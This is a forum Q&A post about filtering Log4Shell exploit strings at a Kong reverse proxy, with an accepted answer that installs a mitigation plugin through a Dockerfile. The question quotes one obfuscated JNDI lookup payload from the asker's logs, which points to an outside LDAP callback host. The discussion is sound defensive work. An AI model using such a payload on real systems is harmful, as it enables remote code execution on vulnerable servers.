# Use kong reverse proxy to filter log4j exploits

Tags: reverse-proxy, log4j, kong

I am using a [kong reverse proxy](https://konghq.com/kong/) to proxy every HTTP request for my web servers. I would like to mitigate the current log4j problem ("[log4shell](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)") by finding and replace the critical attacers' strings like "jndi". For example I found this im my logs:

> ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

I think this could be accomplished by using the [request transformer plugin](https://docs.konghq.com/hub/kong-inc/request-transformer/). Has anyone already done this?

P.S. Just replaceing `jndi` by `disabled` is too far-reaching and breaks a lot of things.

Answer (score 2, accepted):

The guys from kong themselves recently sent a [blog post](https://konghq.com/blog/log4j-log4shell/) that answers my question. They developed a [kong plugin](https://github.com/brentos/kong-plugin-log4shell) that mitigates the exploit.

I added this plugin to my kong by changing my Dockerfile:

```
FROM kong:2.6
...
USER root
...
# log4shell mitigation
# see https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks make
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong
```

Then I just added this log4shell as a global plugin.